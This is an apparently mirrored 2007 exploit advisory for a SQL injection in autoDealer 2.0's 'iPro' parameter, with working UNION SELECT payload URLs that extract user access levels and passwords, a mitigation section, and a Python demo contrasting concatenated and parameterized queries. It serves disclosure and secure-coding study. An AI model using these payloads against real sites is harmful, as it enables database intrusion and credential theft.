autoDealer - exploit.company
Vendor: autoDealer
By: ajann
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: autoDealer
Affected Version From: autoDealer <= 2.0
Affected Version To: autoDealer <= 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Year: 2007

autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

The autoDealer version 2.0 (iPro) is vulnerable to a remote SQL injection attack. An attacker can exploit the vulnerability by injecting malicious SQL code in the 'iPro' parameter in the 'detail.asp' page. This allows the attacker to manipulate the SQL query and retrieve sensitive information from the database. An example of a payload is 'detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users'.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. Until then, site operators can reduce the risk by enforcing strict input validation on the 'iPro' parameter and by using parameterized queries instead of building the SQL statement from the raw query-string value.
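A small Python model of the flaw and of the mitigation above, added here as an example and not code from autoDealer or from the advisory: an in-memory SQLite database stands in for the ASP application's backend, every table and column name except U_ACCESS and U_PASSWORD is assumed, and the page's own iPro payload is run against a concatenating lookup and against a validated, parameterized one.

```python
import re
import sqlite3
import urllib.parse

# The advisory's own payload, URL-decoded exactly as the server would see it.
PAYLOAD = urllib.parse.unquote(
    "-1%20union%20select%200,0,U_ACCESS,0%20from%20users")


def make_db():
    # Constructed stand-in schema (assumption): a four-column product row,
    # which the payload's "0,0,U_ACCESS,0" shape implies, plus a users table
    # carrying the U_ACCESS / U_PASSWORD columns named in the advisory.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT, descr TEXT);
        INSERT INTO products VALUES (1, 'Sedan', '9000', 'used, one owner');
        CREATE TABLE users(U_NAME TEXT, U_PASSWORD TEXT, U_ACCESS TEXT);
        INSERT INTO users VALUES ('admin', 'placeholder-hash', 'administrator');
    """)
    return conn


def detail_vulnerable(conn, ipro):
    # Mirrors the flaw: the raw iPro value is concatenated into the statement,
    # so a UNION SELECT appended by the client becomes part of the query.
    sql = "SELECT id, name, price, descr FROM products WHERE id=" + ipro
    return conn.execute(sql).fetchall()


def detail_hardened(conn, ipro):
    # Mitigation 1: iPro is a numeric product id, so anything that is not an
    # integer is rejected before any SQL is built.
    if not re.fullmatch(r"-?\d+", ipro):
        raise ValueError("iPro must be an integer")
    # Mitigation 2: the value is bound as a parameter, never spliced into the
    # statement text, so it can only ever be compared against id.
    sql = "SELECT id, name, price, descr FROM products WHERE id=?"
    return conn.execute(sql, (int(ipro),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", detail_vulnerable(db, PAYLOAD))  # leaks U_ACCESS
    try:
        detail_hardened(db, PAYLOAD)
    except ValueError as err:
        print("hardened:", err)
```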

Exploit-DB raw data:

*******************************************************************************
# Title   :  autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspsiteware.com
# $$      :  $60.00

*******************************************************************************

[[SQL]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a Hacker!

# milw0rm.com [2007-01-01]